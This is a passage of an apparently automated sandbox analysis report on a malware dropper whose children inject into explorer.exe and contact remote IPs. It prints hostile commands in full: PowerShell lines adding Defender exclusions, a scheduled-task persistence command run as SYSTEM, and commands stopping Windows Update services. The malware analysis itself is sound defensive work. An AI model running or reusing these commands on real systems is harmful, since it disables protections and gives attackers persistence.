                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: bmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: ultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-languageadvertise erroragent is closedapplication/pdfasyncpreemptoffbad certificatebad trailer keybefore EfiGuardclass registredclient finishedcouldn't set AVcouldn't set sbdecode hash: %wdo
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003860000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (a
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: swsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAccepted
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservi
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: ddrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.)
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exeBinary or memory string: rayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\Def
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405C63
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_00402910 FindFirstFileW,2_2_00402910
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeCode function: 2_2_004068B4 FindFirstFileW,FindClose,2_2_004068B4
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429C40 CharUpperW,CharToOemBuffA,CharToOemBuffA,AddConsoleAliasW,GetAltTabInfoA,DrawCaption,WinHttpGetProxyForUrl,SetThreadContext,GetFileAttributesExA,DragAcceptFiles,CoGetInstanceFromFile,__putw,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,GetConsoleAliasesLengthW,WriteConsoleOutputCharacterA,EnumDateFormatsExW,FindNextVolumeMountPointA,GlobalAlloc,GetWindowsDirectoryW,SetThreadIdealProcessor,GetWindowsDirectoryW,SetThreadIdealProcessor,ReadConsoleOutputCharacterW,FatalAppExitW,BuildCommDCBAndTimeoutsA,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,SetConsoleCP,FindAtomW,GetTempPathA,CompareStringA,GetCurrentDirectoryW,lstrlenW,GetLocaleInfoW,GetCommConfig,CancelIo,_hread,CreateHardLinkA,ConvertFiberToThread,DeleteVolumeMountPointA,EnumSystemCodePagesA,GetEnvironmentStringsW,InterlockedIncrement,InterlockedDecrement,GetProcessVersion,SetLocaleInfoA,_hread,_hread,_hread,ReadConsoleInputW,GetPrivateProfileIntW,GetConsoleAliasExesA,OpenJobObjectA,SetTapeParameters,CreateNamedPipeW,BuildCommDCBAndTimeoutsW,VerSetConditionMask,GetCurrencyFormatW,lstrcpyA,ExitProcess,WriteConsoleInputW,GetFileAttributesA,GetStringTypeW,GetPrivateProfileStringA,OpenSemaphoreA,WriteConsoleOutputW,WriteConsoleInputW,AddConsoleAliasW,HeapCreate,DeleteFileA,WriteConsoleInputW,GetFileAttributesA,WaitNamedPipeW,GetCalendarInfoW,CreateDirectoryExW,GetModuleHandleA,SetThreadLocale,_hread,GetCurrentProcess,MoveFileWithProgressA,HeapFree,EnumSystemCodePagesA,FoldStringA,SetFileShortNameW,InterlockedPushEntrySList,QueryDosDeviceA,BuildCommDCBAndTimeoutsW,QueryPerformanceFrequency,FindNextFileW,SetCommState,VerifyVersionInfoW,FindNextVolumeMountPointW,SetCalendarInfoA,GetShortPathNameW,GetVolumePathNameW,GetVolumeNameForVolumeMountPointA,GetConsoleAliasesLengthA,TlsFree,GetDriveTypeW,SetComputerNameA,Process32FirstW,GetFileAttributesA,GetStringTypeW,GetStringTypeW,GetDriveTypeA,GetSystemWindowsDirectoryA,InterlockedPopEntrySList,EnumSystemLocalesW,GetCommState,IsWow64Process,GetSystemDirectoryA,GetTempPathW,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleMode,VirtualProtect,InterlockedIncrement,GetCharWidthFloatA,InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,3_2_00429C40
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429870 WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,3_2_00429870
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429A5C WriteConsoleInputW,WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,3_2_00429A5C
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429A30 DisconnectNamedPipe,AddAtomW,GetSystemWindowsDirectoryW,WriteConsoleInputW,WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,3_2_00429A30
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00429AB9 WriteConsoleInputW,GlobalGetAtomNameA,FindNextFileA,GetCommandLineA,MoveFileWithProgressW,FindFirstFileW,3_2_00429AB9
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_0042A378 InterlockedIncrement,GetCharWidthFloatA,ClearEventLogA,GlobalUnfix,OpenWaitableTimerA,GlobalFlags,LocalFlags,_llseek,GetDlgCtrlID,DebugActiveProcess,GetDlgCtrlID,DebugActiveProcess,WritePrivateProfileSectionW,SleepEx,GetUserDefaultLangID,_llseek,GlobalUnlock,InitiateSystemShutdownA,AbortSystemShutdownW,WinHttpReadData,WinHttpOpen,WinHttpWriteData,RevertToSelf,LoadLibraryW,GetConsoleCursorInfo,GetConsoleOutputCP,TerminateProcess,FindFirstFileW,InterlockedDecrement,GetModuleHandleW,CreateActCtxW,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GlobalFindAtomW,lstrlenA,GetModuleHandleA,VerLanguageNameW,CreateEventW,ExpandEnvironmentStringsA,GetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,3_2_0042A378
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeSystem information queried: ModuleInformationJump to behavior

                          Anti Debugging

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeSystem information queried: CodeIntegrityInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\cdttvvcSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_004124B2 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_004124B2
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00830042 push dword ptr fs:[00000030h]3_2_00830042
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00957CE1 push dword ptr fs:[00000030h]3_2_00957CE1
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeCode function: 5_2_02B6B0A3 push dword ptr fs:[00000030h]5_2_02B6B0A3
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeCode function: 17_2_02B160A3 push dword ptr fs:[00000030h]17_2_02B160A3
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 57_2_00A50042 push dword ptr fs:[00000030h]57_2_00A50042
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 57_2_00A87C11 push dword ptr fs:[00000030h]57_2_00A87C11
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Roaming\cdttvvcProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_0040B6B9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0040B6B9
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_0040B6B9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0040B6B9
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00408F61 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00408F61
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_0040C7CA SetUnhandledExceptionFilter,3_2_0040C7CA
                          Source: C:\Windows\System32\conhost.exeCode function: 60_2_00007FF6EB431180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,60_2_00007FF6EB431180

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Windows\explorer.exeNetwork Connect: 95.214.26.28 80
                          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.34.170 443
                          Source: C:\Windows\explorer.exeNetwork Connect: 51.15.58.224 14433
                          Source: C:\Windows\explorer.exeFile created: cdttvvc.19.drJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                          Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: C:\Windows\Temp\whxcdqscjswq.tmp target: C:\Windows\System32\conhost.exe protection: readonly
                          Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: C:\Windows\Temp\whxcdqscjswq.tmp target: C:\Windows\explorer.exe protection: readonly
                          Source: C:\Users\user\AppData\Roaming\cdttvvcSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\cdttvvcSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeMemory written: C:\Users\user\AppData\Local\Temp\toolspub2.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Roaming\cdttvvcMemory written: C:\Users\user\AppData\Roaming\cdttvvc base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00830110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,3_2_00830110
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeThread created: C:\Windows\explorer.exe EIP: 8791930Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\cdttvvcThread created: unknown EIP: 51B1930
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                          Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\conhost.exe base: C4498F9010
                          Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\explorer.exe base: A72010
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                          Source: C:\Program Files\Google\Chrome\updater.exeMemory written: PID: 880 base: A72010 value: 00
                          Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 6888
                          Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 880
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#nvjdnn#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }Jump to behavior
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#nvjdnn#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#mgttsuddg#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; }
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exe "C:\Users\user\AppData\Local\Temp\InstallSetup5.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe "C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\latestX.exe "C:\Users\user\AppData\Local\Temp\latestX.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeProcess created: C:\Users\user\AppData\Local\Temp\toolspub2.exe "C:\Users\user\AppData\Local\Temp\toolspub2.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofileJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                          Source: C:\Users\user\AppData\Roaming\cdttvvcProcess created: C:\Users\user\AppData\Roaming\cdttvvc C:\Users\user\AppData\Roaming\cdttvvc
                          Source: Broom.exe, 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: Shell_TrayWndSVW
                          Source: Broom.exe, 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SV
